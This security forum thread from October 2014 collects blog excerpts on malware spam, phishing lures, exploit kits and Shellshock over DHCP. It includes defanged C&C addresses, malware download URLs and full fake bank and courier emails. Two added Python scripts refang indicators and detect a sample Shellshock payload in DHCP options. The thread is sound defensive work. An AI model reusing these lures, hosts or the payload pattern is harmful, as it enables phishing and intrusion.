- http://www.theinquirer.net/inquirer/news/2374349/adobe-accused-of-spying-on-e-book-readers
Oct 7 2014

- http://arstechnica.com/security/2014/10/adobes-e-book-reader-sends-your-reading-logs-back-to-adobe-in-plain-text/
Oct 7 2014

- http://the-digital-reader.com/2014/10/06/adobe-spying-users-collecting-data-ebook-libraries/

:mad: :fear:
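The indicators in these posts are deliberately "defanged" (spaces before dots, "http ://", "37.61.235.199 /~zantest", "montag @ myonlinesecurity .co .uk") so that nothing is clickable. Anyone turning a thread like this into a proxy or DNS blocklist has to reverse that consistently, and a one-off regex per post tends to miss the IP-with-port and e-mail forms. The following is an added example (not code from any of the quoted blogs) of a small refang-and-extract routine that handles the spacing conventions used in this thread; the sample text is constructed with documentation-range IPs and example domains, so it does not reproduce any live indicator, and the rule set is a heuristic rather than a standard.

```python
"""Re-assemble the 'defanged' indicators posted in this thread into a blocklist.

Added example; not code from any of the quoted blogs. The sample text is
constructed in the thread's own spacing style ("http ://", "example .net",
"1.2.3.4 :37400") using documentation-range IPs and example domains, so it
does not reproduce any live indicator from the posts above.
"""
import re
from typing import Dict, List, Tuple

# Each rule undoes one defanging habit seen in the thread. The two scheme
# rules must run in this order; the rest are independent. All are heuristics.
DEFANG_RULES: List[Tuple[re.Pattern, str]] = [
    (re.compile(r"\s*\[\.\]\s*"), "."),                          # example[.]com
    (re.compile(r"hxxp(s?)\s*://", re.I), r"http\1://"),          # hxxp://
    (re.compile(r"(https?)\s+://", re.I), r"\1://"),             # "http ://"
    (re.compile(r"(?<=[A-Za-z0-9])\s+\.(?=[A-Za-z0-9])"), "."),  # "host .net"
    (re.compile(r"\s*@\s*"), "@"),                                # "user @ host"
    (re.compile(r"(?<=[A-Za-z0-9])\s+:(?=\d)"), ":"),             # "1.2.3.4 :8080"
    (re.compile(r"(?<=[A-Za-z0-9])\s+/(?=[~\w])"), "/"),          # "1.2.3.4 /~path"
]

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.I)
# Scheme-less "IP[:port]/path" references, as in the C&C lists in this thread.
IPPATH_RE = re.compile(r"(?<!/)\b(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?/\S*")
EMAIL_RE = re.compile(r"[\w.+-]+@(?:[a-z0-9-]+\.)+[a-z]{2,}", re.I)
DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)
# Dotted filenames look like domains to DOMAIN_RE; drop these pseudo-TLDs.
FILE_EXTS = {"exe", "scr", "pif", "zip", "pdf", "doc", "xls", "png", "gif",
             "jpg", "jpeg", "htm", "html", "php", "asp", "soa", "wav"}

# Constructed sample in the thread's own spacing style (not live indicators).
SAMPLE_TEXT = """\
Some of the sites are
http ://malware-host .example .net:8080/Gdrive/GDrive025384.exe
The link in the PDF goes to 203.0.113.7 /~phish/DHL/index .htm
Email-Id: victim @ corp .example .com
C&C: 198.51.100.13 :37400/0810uk1/HOME/0/51-SP3/0/
Current Virus total detections: 5/55* . This is a spoofed icon file.
"""


def refang(text: str) -> str:
    """Undo the spacing/bracket defanging so the indicators can be matched."""
    for pattern, repl in DEFANG_RULES:
        text = pattern.sub(repl, text)
    return text


def extract_iocs(text: str) -> Dict[str, List[str]]:
    """Return de-duplicated URLs, IPs, domains and e-mail addresses from defanged text."""
    clean = refang(text)
    urls = set(URL_RE.findall(clean)) | set(IPPATH_RE.findall(clean))
    emails = set(EMAIL_RE.findall(clean))
    ips = set(IP_RE.findall(clean))
    domains = set()
    for url in urls:
        # Host part: strip scheme, path and port; skip bare IP hosts.
        host = url.split("://", 1)[-1].split("/", 1)[0].split(":", 1)[0]
        if not IP_RE.fullmatch(host):
            domains.add(host.lower())
    for addr in emails:
        domains.add(addr.split("@", 1)[1].lower())
    for d in DOMAIN_RE.findall(clean):
        if d.rsplit(".", 1)[1].lower() not in FILE_EXTS:
            domains.add(d.lower())
    return {"urls": sorted(urls), "ips": sorted(ips),
            "domains": sorted(domains), "emails": sorted(emails)}


if __name__ == "__main__":
    for kind, values in extract_iocs(SAMPLE_TEXT).items():
        print(kind)
        for v in values:
            print("  ", v)
```

The rules are anchored on an alphanumeric character before the stray space so that ordinary prose punctuation ("5/55* . This") is left alone, and the domain pass drops matches whose last component is a file extension, which otherwise turns every "GDrive025384.exe" in a post into a bogus hostname. The output is meant to feed a DNS sinkhole or proxy denylist, which is the only place the re-assembled strings need to exist.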

AplusWebMaster
2014-10-08, 14:45
FYI...

Fake Business proposal - Phish ...
- https://blog.malwarebytes.org/fraud-scam/2014/10/dear-important-business-proposal/
Oct 8, 2014 - "Carter Ham, a retired four-star United States Army general, is supposedly on Linkedin—and he wants you (to read his personal message)... clearly a scheme to phish for information from unwary recipients. Below is a screenshot of the sender’s online profile:
General Carter Ham on Linkedin. Not!:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/linkedin-gch.png
... As far as the legitimacy of the profile goes, the blurb from the Summary section was copied and pasted from this Wikipedia page*. We don’t know if the former general is indeed on the said social networking site (in case you’re wondering). What we -do- know is that if you receive a message similar to the one above asking for personal information from you in exchange for a slice of the cash s/he wanted to move, it’s best to ignore the message and check with this contact if his/her account has been hacked or not."
* http://en.wikipedia.org/wiki/Carter_Ham
___

Fake Lloyds and NatWest SPAM - malware
- http://blog.dynamoo.com/2014/10/malware-spam-lloyds-important.html
8 Oct 2014 - "... familiar pattern to this malware-laden spam, but with an updated payload from before:
Lloyds Commercial Bank: "Important - Commercial Documents"
From: Lloyds Commercial Bank [secure@ lloydsbank .com]
Date: 8 October 2014 11:09
Subject: Important - Commercial Documents
Important account documents
Reference: C437
Case number: 66324010
Please review BACs documents.
Click link below, download and open document. (PDF Adobe file) ...

From: NatWest [secure.message@ natwest .com]
Date: 8 October 2014 10:29
Subject: You have a new Secure Message - file-2620
You have received a encrypted message from NatWest Customer Support
In order to view the attachment please open it using your email client ( Microsoft Outlook, Mozilla Thunderbird, Lotus )
Please download your ecnrypted message at ...
(Google Disk Drive is a file hosting service operated by Google, Inc.) ...

The link in the email runs through a script which will attempt to download a ZIP file pdf-to-view_864129_pdf.zip onto the target machine which in turn contains a malicious executable pdf-to-view_864129_pdf.exe which has a VirusTotal detection rate of 6/53*. The Malwr report indicates that the malware phones home to the following locations which are worth -blocking- especially 94.75.233.13 (Leaseweb, Netherlands) which looks like a C&C server."
94.75.233.13 :37400/0810uk1/HOME/0/51-SP3/0/
94.75.233.13 :37400/0810uk1/HOME/1/0/0/
94.75.233.13 :37400/0810uk1/HOME/41/5/1/
cemotrans .com/seo/0810uk1.soa
* https://www.virustotal.com/en/file/3c04500e3adf84f62f6428f5d739d5f877e81071bcdfff9d186f120533ffe0df/analysis/1412773720/
... Behavioural information
DNS requests
cemotrans .com (82.98.157.8)
TCP connections
94.75.233.13: https://www.virustotal.com/en/ip-address/94.75.233.13/information/
82.98.157.8: https://www.virustotal.com/en/ip-address/82.98.157.8/information/
___

Fake photo SPAM – malware
- http://myonlinesecurity.co.uk/photo-8-oct-2014-malware/
8 Oct 2014 - "'photo 8 oct 2014' pretending to come from various @yahoo.co.uk addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email is very plain and terse with the subject of photo 8 oct 2014 and the body simply says:

Sent from my iPhone

8 October 2014: Img-0034.zip: Extracts to: Img-0034.jpeg
Current Virus total detections: 2/54* . Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email. Whether it is a message saying “look at this picture of me I took last night” and it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day..."
* https://www.virustotal.com/en/file/272804c706382e8a994bce09d36f0d620ba97dde68c2b590f26d442f984ce773/analysis/1412768396/
___

Fake Invoice Balance SPAM - word doc malware
- http://myonlinesecurity.co.uk/invoice-balance-fake-word-doc-malware/
8 Oct 2014 - "'Invoice Balance' pretending to come from various Hotmail .co.uk addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
HELLO,
work-life balance.
Thanks
---

8 October 2014: Invoice_Balance_september_doc.zip: Extracts to: Invoice_Balance_september_doc.exe
Current Virus total detections: 2/53* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper word .doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/272804c706382e8a994bce09d36f0d620ba97dde68c2b590f26d442f984ce773/analysis/1412766448/
___

Australian Taxation Office Refund Spam
- http://threattrack.tumblr.com/post/99483080723/australian-taxation-office-refund-spam
Oct 8, 2014 - "Subjects Seen:
Australian Taxation Office - Refund Notification
Typical e-mail details:
IMPORTANT NOTIFICATION
Australian Taxation Office - 08/10/2014
After the last calculation of your fiscal activity we have determined that you are eligible to receive a refund of 2398.43 AUD.
For more details please follow the steps bellow :
- Right-click the link on the attachment name, and select Save Link As, Save Target As or a similar option provided.
- Select the location into which you want to download the file and choose Save.
- Unzip the attached file.
Ingrid Warren,
Tax Refund Department
Australian Taxation Office

Malicious File Name and MD5:
ATO_TAX_419771083.zip (EBE4991F3C1C4B00E3E8662577139F3E)
ATO_TAX_419771083.pdf.scr (A89CD5ACAB413D308A565B21B481A2F8)

Tagged: australian taxation office, Upatre, ATO

:fear: :mad:

AplusWebMaster
2014-10-09, 13:18
FYI...

Nuclear EK active on 178.79.182.106
- http://blog.dynamoo.com/2014/10/nuclear-ek-active-on-17879182106.html
9 Oct 2014 - "It looks like the Nuclear exploit kit is active on 178.79.182.106 (Linode, UK), using hijacked subdomains of legitimate domains using AFRAID.ORG nameservers. I can see the following sites active on that IP:
fuhloizle .tryzub-it .co.uk
fuhloizle .pgaof39 .com
fuhloizle .cusssa .org
"fuhloizle" is a pretty distinctive search string to look for in your logs. It looks like the bad sites might be down at the moment (or the kit is hardened against analysis), but blocking this IP address as a precaution might be a good idea."
178.79.182.106: https://www.virustotal.com/en/ip-address/178.79.182.106/information/
___

chinaregistry .org.cn domain SCAM
- http://blog.dynamoo.com/2014/10/chinaregistryorgcn-domain-scam.html
9 Oct 2014 - "This is an old scam that can safely be ignored.
From: Henry Liu [henry.liu@ chinaregistry .org.cn]
Date: 9 October 2014 07:53
Subject: [redacted] domain and keyword in CN
(Please forward this to your CEO, because this is urgent. Thanks)
We are a Network Service Company which is the domain name registration center in Shanghai, China. On Oct 7, 2014, we received an application from Huaya Holdings Ltd requested "[redacted]" as their internet keyword and China (CN) domain names. But after checking it, we find this name conflict with your company name or trademark. In order to deal with this matter better, it's necessary to send email to you and confirm whether this company is your distributor or business partner in China?
Kind regards
Henry Liu
General Manager
China Registry (Headquarters)
3002, Nanhai Building, No. 854 Nandan Road,
Xuhui District, Shanghai, China ...

Nobody is trying to register your domain name, this is simply a long-running scam aimed at getting you to spend too much money on something that you don't need. And I strongly recommend that you don't forward junk email like this to your CEO either..."
(Short video at the dynamoo URL above.)
___

Bash Bug saga continues: Shellshock Exploit via DHCP
- http://blog.trendmicro.com/trendlabs-security-intelligence/bash-bug-saga-continues-shellshock-exploit-via-dhcp/
Oct 8, 2014 - "The Bash vulnerability known as Shellshock can be exploited via several attack surfaces including web applications, DHCP, SIP, and SMTP. With multiple proofs of concept (including -Metasploit- code) available in the public domain, this vulnerability is being heavily exploited. Most discussion of Shellshock attacks has focused on attacks on web apps. There has been relatively little discussion on other surfaces like DHCP, SMTP, and CUPS... techniques could be used by an attacker to compromise more machines within the network. Dynamic Host Configuration Protocol (DHCP) is a protocol used to dynamically distribute and assign network configuration settings, such as IP addresses. An attacker can configure a compromised DHCP server or create a rogue DHCP server to send -malicious- information to the DHCP client. Either technique means that the attacker has already compromised the network using other attack vectors... Various techniques can be used to exploit Shellshock over DHCP..."
(More detail at the trendmicro URL above.)

:mad: :fear:
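The DHCP angle above comes down to one thing a defender can check for: an option value that starts with a bash function definition. The following is an added example, not code from the Trend Micro post or from this thread; it parses the RFC 2132 option TLVs of a DHCP message and flags values carrying the Shellshock prefix. The option numbers in the constructed samples (15 domain name, 114 URL) are assumed carriers for illustration, not the only ones.

```python
"""Detect Shellshock-style function definitions in DHCP option values.

Added example; not code from the Trend Micro post quoted above. DHCP client
hook scripts may export option values as environment variables before
invoking bash, which is the DHCP attack surface described in that post.
This parser walks the RFC 2132 option TLVs that follow the magic cookie and
flags any value beginning with the function-definition prefix that an
unpatched bash evaluates. Option numbers used in the constructed samples
(15 domain name, 114 URL) are illustrative; any string option can carry it.
"""
import re
import struct

MAGIC_COOKIE = b"\x63\x82\x53\x63"  # marks the start of the options field
OPT_PAD, OPT_END = 0, 255

# Shellshock trigger: a value beginning with "() {" (whitespace tolerant).
SHELLSHOCK_RE = re.compile(rb"^\s*\(\)\s*\{")


def parse_options(options):
    """Return a list of (code, value) pairs from a DHCP options field."""
    if not options.startswith(MAGIC_COOKIE):
        raise ValueError("missing DHCP magic cookie")
    pairs = []
    i = len(MAGIC_COOKIE)
    while i < len(options):
        code = options[i]
        if code == OPT_PAD:          # single-byte padding, no length field
            i += 1
            continue
        if code == OPT_END:          # end marker; ignore anything after it
            break
        if i + 1 >= len(options):
            raise ValueError("truncated option header at offset %d" % i)
        length = options[i + 1]
        value = options[i + 2:i + 2 + length]
        if len(value) != length:     # length claims more bytes than present
            raise ValueError("truncated option %d" % code)
        pairs.append((code, value))
        i += 2 + length
    return pairs


def find_shellshock(options):
    """Codes of the options whose value carries a Shellshock function prefix."""
    return [code for code, value in parse_options(options)
            if SHELLSHOCK_RE.match(value)]


def build_options(pairs):
    """Constructed-sample helper: encode (code, value) pairs as an options field."""
    body = b"".join(struct.pack("BB", code, len(value)) + value
                    for code, value in pairs)
    return MAGIC_COOKIE + body + bytes([OPT_END])


# Constructed samples: a normal DHCPOFFER option set and one from a rogue server.
BENIGN = build_options([(53, b"\x02"), (15, b"corp.example"),
                        (114, b"http://wpad.corp.example/wpad.dat")])
ROGUE = build_options([(53, b"\x02"), (15, b"corp.example"),
                       (114, b"() { :;}; echo test")])

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("rogue", ROGUE)):
        print(label, "flagged options:", find_shellshock(sample))
```

A malformed options field raises rather than being silently skipped, since a truncated or oversized option from a DHCP server is itself worth an alert.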

AplusWebMaster
2014-10-10, 16:43
FYI...

Fake fax, 'Secure msg' SPAM - malware
- http://blog.dynamoo.com/2014/10/malware-spam-youve-received-new-fax-you.html
10 Oct 2014 - "A pair of malware spams this morning, both with the same payload:

"You've received a new fax"
From: Fax [fax@ victimdomain .com]
Date: 10 October 2014 11:34
Subject: You've received a new fax
New fax at SCAN7097324 from EPSON by https ://victimdomain .com
Scan date: Fri, 10 Oct 2014 18:34:56 +0800
Number of pages: 2
Resolution: 400x400 DPI
You can secure download your fax message at ...
(Google Disk Drive is a file hosting service operated by Google, Inc.)

"You have received a new secure message from BankLine"
From: Bankline [secure.message@ bankline .com]
Date: 10 October 2014 10:29
Subject: You have received a new secure message from BankLine
You have received a secure message.
Read your secure message by following the link ...
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it...

The malware downloads a file document_73128_91898_pdf.zip from the target site that contains a malicious executable document_73128_91898_pdf.exe which has a VirusTotal detection rate of 4/54*. According to the ThreatExpert report... the malware communicates with the following URLs which are probably worth -blocking- or monitoring"
94.75.233.13 /1010uk1/NODE01/41/5/1/
94.75.233.13 /private/sandbox_status.php
94.75.233.13 /1010uk1/NODE01/0/51-SP3/0/
94.75.233.13 /1010uk1/NODE01/1/0/0/
beanztech .com/beanz/1010uk1.rtf
* https://www.virustotal.com/en/file/5c3643b5cf2c5a392a55589e5025bfe659149a0b5da662ad8989f25005ba28cc/analysis/1412937674/

94.75.233.13: https://www.virustotal.com/en/ip-address/94.75.233.13/information/
___

Gameover Zeus... at Vogue .com
- http://www.threattracksecurity.com/it-blog/gameover-zeus-accessorizes-vogue-com/
Oct 10, 2014 - "Our researchers this week spotted a Gameover Zeus sample receiving commands to download Zemot from hxxp ://media .vogue[dot]com/voguepedia/extensions/dimage/cache/1zX67.exe
... Others have spotted Gameover Zeus reaching out to a compromised vogue.com domain to download Zemot – a family of Trojan downloaders – which according to Microsoft is usually distributed via the Kuluoz botnet*. Behavior worth noting in this Gameover Zeus sample upon execution is that it crawled a list of DGA domains... this Gameover Zeus sample seems to be an updated variant targeting -financial- processes we’ve not yet seen in previous reports... According to URLquery.net**, there were several malicious files being served on the Vogue domain, which have been removed. 1zX67.exe was an active threat as late as yesterday evening..."
* http://blogs.technet.com/b/mmpc/archive/2014/09/09/msrt-september-2014-zemot.aspx

** http://www.urlquery.net/report.php?id=1412718766058
___

Mobile ads use malware tricks to get installs
- https://blog.malwarebytes.org/mobile-2/2014/10/mobile-advertisers-use-malware-tricks-to-get-installs/
Oct 10, 2014 - "Deceptive advertising targeting Android users is an effective way of getting malware installed. Now some advertisers are using it to get paid through pay-per-install schemes... we’ve been seeing more and more of this, but this time advertisers are using these banner and pop-up ads to get installs of more trustworthy apps like Dolphin browser. The messages are less scary than the virus related ones, but they are still meant to get your attention. It seems a bit backwards but it’s all about making money, ad developers are just as greedy as malware authors–just not as malicious. Anytime during your mobile browsing experience, if you encounter one of these pop-ups or similar just ignore and it’d probably be best to -leave- the site displaying them:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/and_ads06.jpg?w=564
...
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/and_ads05.jpg?w=564
Don’t fall for these messages, Android won’t use web pop-ups to inform you of updates, they’ll be handled through a system notification and apps will update via Google Play Services. Using a tool like Adblock Plus which will filter URL traffic can help prevent most of these ads. Adblock Plus is a third-party app, will require a bit of configuration* and only blocks WiFi traffic.
* https://adblockplus.org/en/android-config
...
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/and_ad11.jpg
On iOS you won’t see the warning pop-ups, instead you’ll immediately be -redirected- to the peddled apps App Store page. If, by chance, you’re interested in installing one of these apps go -directly- to your trusted source for apps. By following the redirect you might be going down another rabbit hole and end up getting -malware- instead of the original."
___

October 2014 Web Server Survey
- http://news.netcraft.com/archives/2014/10/10/october-2014-web-server-survey.html
10 Oct 2014 - "In the October 2014 survey we received responses from 1,028,932,208 sites, which is nearly six million more than last month. Microsoft lost the lead to Apache this month, as the two giants continue to battle closely for the largest share of all websites. Apache gained nearly 30 million sites, while Microsoft lost 22 million, causing Apache to be thrust back into the lead by more than 36 million sites. In total, 385 million sites are now powered by Apache, giving it a 37.45% share of the market. A significant contributor to this change was the expiry of domains previously used for link farming on Microsoft IIS servers. The domains used by these link farms were acquired and the sites are now hosted on Apache servers..."
(Charts available at the URL above.)

:fear: :mad:

AplusWebMaster
2014-10-13, 12:31
FYI...

Fake Amazon SPAM - Word doc malware
- http://myonlinesecurity.co.uk/amazon-co-uk-order-word-doc-malware/
13 Oct 2014 - "'Your Amazon.co.uk order #} random letters and numbers' pretending to come from AMAZON .CO.UK <order@ amazon .co.uk> and all being sent to 1122@ eddfg .com with a bcc to your email address is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/amazon_order_Oct.png

13 October 2014 : 575-3010892-0992746.doc Current Virus total detections: 0/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is -NEVER- open any attachment to an email, unless you are expecting it... The best way is to just delete the unexpected zip and not risk any infection."
* https://www.virustotal.com/en/file/3bbcdea4e4f6427296f8b57a77ee70967b9a91a703d69306296c78e1e92fe318/analysis/1413181748/

- http://blog.dynamoo.com/2014/10/your-amazoncouk-order-spam-with.html
13 Oct 2014
___

Fake BankLine SPAM - malware
- http://blog.dynamoo.com/2014/10/malware-spam-you-have-received-new.html
13 Oct 2014 - "A couple of unimaginative spam emails leading to a malicious payload.

You have received a new secure message from BankLine
From: Bankline [secure.message@ bankline .com]
Date: 13 October 2014 12:48
Subject: You have received a new secure message from BankLine
You have received a secure message.
Read your secure message by following the link ...
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it...

You've received a new fax
From: Fax [fax@ victimdomain .com]
Date: 13 October 2014 13:07
Subject: You've received a new fax
New fax at SCAN2166561 from EPSON by https ://victimdomain .com
Scan date: Mon, 13 Oct 2014 20:07:31 +0800
Number of pages: 2
Resolution: 400x400 DPI
(Dropbox Drive is a file hosting service operated by Google, Inc.)

Clicking the link downloads document_312_872_pdf.zip from the target site which in turn contains a malicious executable document_312_872_pdf.exe which has a VirusTotal detection rate of 3/54*... Also dropped are a couple of executables, egdil.exe (VT 2/54**, Malwr report) and twoko.exe (VT 6/55***, Malwr report).
Recommended blocklist:
94.75.233.13
144.76.220.116
85.25.152.238
carcomputer .co.uk
phyccess .com
hotelnuovo .com
wirelesssolutionsny .com
isc-libya .com "
* https://www.virustotal.com/en/file/a598ddc9af8438ac29a43a33c8dae09a996d77a5ae10331d7a02ea1df1e0d339/analysis/1413208781/

** https://www.virustotal.com/en/file/35274a3ffbe34b8b17ccdc147cd721c5748d39c6a143b0e4b67812767a4d197b/analysis/1413210259/

*** https://www.virustotal.com/en/file/e464613eaa2aec9fee27a4e3bb91219ca2c5cb38a41217604d6cde292f416445/analysis/1413210280/
___

Barclaycard phishing ...
- http://myonlinesecurity.co.uk/barclaycard-phishing-attempts/
13 Oct 2014 - "We are seeing quite a few Barclaycard phishing attempts today trying to get your Barclaycard details. These are not very well crafted and look nothing like any genuine Barclaycard emails. Do -not- click any links in these emails. Hover your mouse over the links and you will see a web address that isn’t Barclaycard. Immediately delete the email and the safest way to make sure that it isn’t a genuine email from Barclaycard is to type the Barclaycard web address in your browser, and then log in to the account that way...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/barclaycard_phishing-email.png

... using what look like they are hijacked/compromised subdomains of a real website. All of them use a random subdomain and then the website name and then /clients/? The site looks like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/barclaycard_phishing-site.png
Following the link in this Barclaycard or other spoofed emails takes you to a website that looks exactly like the real Barclaycard site. You are then taken through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your Barclaycard account, but also your Bank Account, and potentially your email details and webspace (if you have it). They want enough information to completely impersonate you and your identity not only in cyberspace but in real life..."
___

Fake Bank application SPAM - malware
- http://www.hoax-slayer.com/fnbo-account-application-malware-email.shtml
Oct 13 2014 - "Email purporting to be from First National Bank of Omaha (FNBO) claims that your account application has been received and invites you to open an -attached- file to view documents about your application:
Re: Applicant #9908541042
Hello,
Your application for an FNBO Direct account has been received. As an FNBO Direct customer, not only will you receive an exceptional interest rate, you can be confident your accounts are held by a bank established in values of trust, integrity, and security.
Please find in the attached document information concerning your application.
Copyright (c) 2014 FNBO Direct, a division of First National Bank of Omaha. All Rights Reserved. Deposit Accounts are offered by First National Bank of Omaha,
Member FDIC. Deposits are insured to the maximum permitted by law.
P.O. Box 3707, Omaha, NE 68103-0707
For information on FNBO Direct's privacy policy, please visit [Link removed]
Email ID: A0963.6
(Email included attached file with the name: 'FNBO_Direct_application_9908541042.zip')

According to this email, which claims to be from First National Bank of Omaha (FNBO), your application for an FNBO Direct account has been received. The message advises that information about your application is contained in an -attached- document... it masquerades as a seemingly legitimate business message and uses the name of a real company... the attached .zip file... contains a .exe file. Clicking the .exe file would install a trojan on your computer... do -not- open any attachments or click any links that it contains. You can report fraudulent FNBO emails via the reporting address on the bank's website*."
* https://www.fnbodirect.com/site/security-center/email-fraud.fhtml
___

Fake FedEx SPAM
- http://blog.mxlab.eu/2014/10/12/fake-email-your-payment-invoice-slip-from-fedex-contains-trojan/
Oct 12, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Your Payment Invoice Slip”. This email is sent from the -spoofed- address “info@ ukboxingstore .co.uk” and has the following body:
Dear customer.
A parcel was sent to your home address.
And it will arrive within 3 business day.
More information and the tracking number are attached in the document.
Please do not respond to this message. This email was sent from an unattended mailbox.
This report was generated at approximately GMT on 06/10/2014.
To learn more about FedEx Express, please visit our website at fedex.com.
All weights are estimated.
To track the latest status of your shipment, View on the tracking number on the attached document
This tracking update has been sent to you by FedEx on the behalf of the Request or noted above.
FedEx does not validate the authenticity of the requestor and does not validate,
guarantee or warrant the authenticity of the request, the requestor’s message, or the accuracy of this tracking update...
Thank you for your business.
FedEx Customer Service

The attached ZIP file has the name FEDEX SHIPPING NOTIFICATION (1).zip and contains the 396 kB large file XXXX.exe. The trojan is known as TR/Dropper.Gen8, a variant of Win32/Injector.BNJA, HB_Ispi or Win32:Malware-gen. At the time of writing, 5 of the 55 AV engines did detect the trojan at VirusTotal*..."
* https://www.virustotal.com/en/file/7ffd0d31de67f7ece1bf472959078fda55a8091b9487e55c9a3579d8f55a68b1/analysis/1413096741/

:mad: :fear:

AplusWebMaster
2014-10-14, 16:14
FYI...

Fake DOC attachment SPAM - malware
- http://blog.dynamoo.com/2014/10/to-view-your-document-please-open.html
14 Oct 2014 - "This spam comes with a malicious DOC attachment:

From: Anna [ºžô õö?ǯ#-øß {qYrÝsØ l½:ž±þ EiÉ91¤É¤y$e| p‹äŒís' ÀQtÃ#7 þ–¿åoù[þ–¿åoù[þ–¿åoù[þ–¿åÿ7 å{˜x|%S;ÖUñpbSË‘ý§B§i…¾«¿¨` Òf ¶ò [no-reply@ bostonqatar .net]
Date: 14 October 2014 11:09
Subject: Your document
To view your document, please open attachment.

The "From" field in the samples I have seen seems to be a random collection of characters. The DOC attachment is also randomly named in the format document_9639245.doc. This word document contains a malicious macro [pastebin] which downloads an additional component from pro-pose-photography .co.uk/fair/1.exe. The DOC file has a VirusTotal detection rate of 0/55* and the EXE file is just 2/54** ... UPDATE: among other things the malware drops the executable pefe.exe with a detection rate of 3/55***..."
* https://www.virustotal.com/en-gb/file/38e14668c5676fd53234abc8128ba16b2f5b19ccadaa6dda75c3a2bf9480d285/analysis/1413281775/

** https://www.virustotal.com/en-gb/file/9f202cf5e15101c5a7e05280ad4dc86092b4036dcbbd8dd144e58c4115638e75/analysis/1413283670/

*** https://www.virustotal.com/en-gb/file/c9ae7f694229861dd05492bd532980f2504c3bc3ce58fd6fad71c44cb053d643/analysis/1413287366/

- http://myonlinesecurity.co.uk/document-word-doc-malware/
14 Oct 2014 - "... The email is very plain, simple and terse and just says:

To view your document, please open attachment.

14 October 2014: document_1720781.doc Current Virus total detections: 0/55* ..."
* https://www.virustotal.com/en/file/38e14668c5676fd53234abc8128ba16b2f5b19ccadaa6dda75c3a2bf9480d285/analysis/1413281933/
___

Fake Sales Order SPAM - word doc malware
- http://myonlinesecurity.co.uk/sales-order-number-son1410-000183-fake-word-doc-malware/
14 Oct 2014 - "'Sales Order Number SON1410-000183' pretending to come from mail@ firwood .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
<html>
<body bgcolor="#FFFFFF">
<table width="750" border="0">
<tr>
<td>
<font face="verdana" size="2"></font>
<br><br>
<font face="verdana" size="2">Please find the attached document a summary
of which is below:</font>
</td>
</tr>
</table>
<table width="750" border="0"> ...
</table>
<font face="verdana" size="2">Regards </br></br><B>Firwood Paints Ltd
</B></br>Oakenbottom Road </br>Bolton BL2 6DP England </br></br>Tel +44
(0)1204 525231 </br>Fax +44 (0)1204 362522 </br>e mail mail@ firwood .co.uk
</br></font>
</body>
</html>
Automated mail message produced by DbMail.
Registered to X3 – Sage North America, License EDM2013051.
This message has been scanned for viruses by BlackSpider MailControl ...

14 October 2014: Extracts to: SON141000-000183.pdf.exe
Current Virus total detections: 13/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper word .doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/1fd1e3787b4982b6029ebd9859d6aff3bd313903a2322c29a80bbd105a5651ac/analysis/1413274440/
___

YouTube Ads lead to Exploit Kits ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/youtube-ads-lead-to-exploit-kits-hit-us-victims/
Oct 14, 2014 - "Malicious ads are a common method of sending users to sites that contain malicious code. Recently, however, these ads have showed up on a new attack platform: YouTube. Over the past few months, we have been monitoring a malicious campaign that used malicious ads to direct users to various malicious sites. Users in the United States have been affected almost exclusively, with more than 113,000 victims in the United States alone over a 30-day period.
Countries affected by this malicious ad campaign:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/malad.jpg
Recently, we saw that this campaign was showing up in ads via YouTube as well. This was a worrying development: not only were malicious ads showing up on YouTube, they were on videos with more than 11 million views – in particular, a music video uploaded by a high-profile record label. The ads we’ve observed do not -directly- lead to malicious sites from YouTube. Instead, the traffic passes through two advertising sites, suggesting that the cybercriminals behind this campaign bought their traffic from legitimate ad providers. In order to make their activity look legitimate, the attackers used the -modified- DNS information of a Polish government site. The attackers did not compromise the actual site; instead they were able to change the DNS information by adding subdomains that lead to their own servers. (How they were able to do this is unclear.) The traffic passes through two -redirection- servers (located in the Netherlands) before ending up at the malicious server, located in the United States. The exploit kit used in this attack was the Sweet Orange exploit kit. Sweet Orange is known for using four vulnerabilities, namely:
CVE-2013-2460 – Java
CVE-2013-2551 – Internet Explorer
CVE-2014-0515 - Flash
CVE-2014-0322 – Internet Explorer
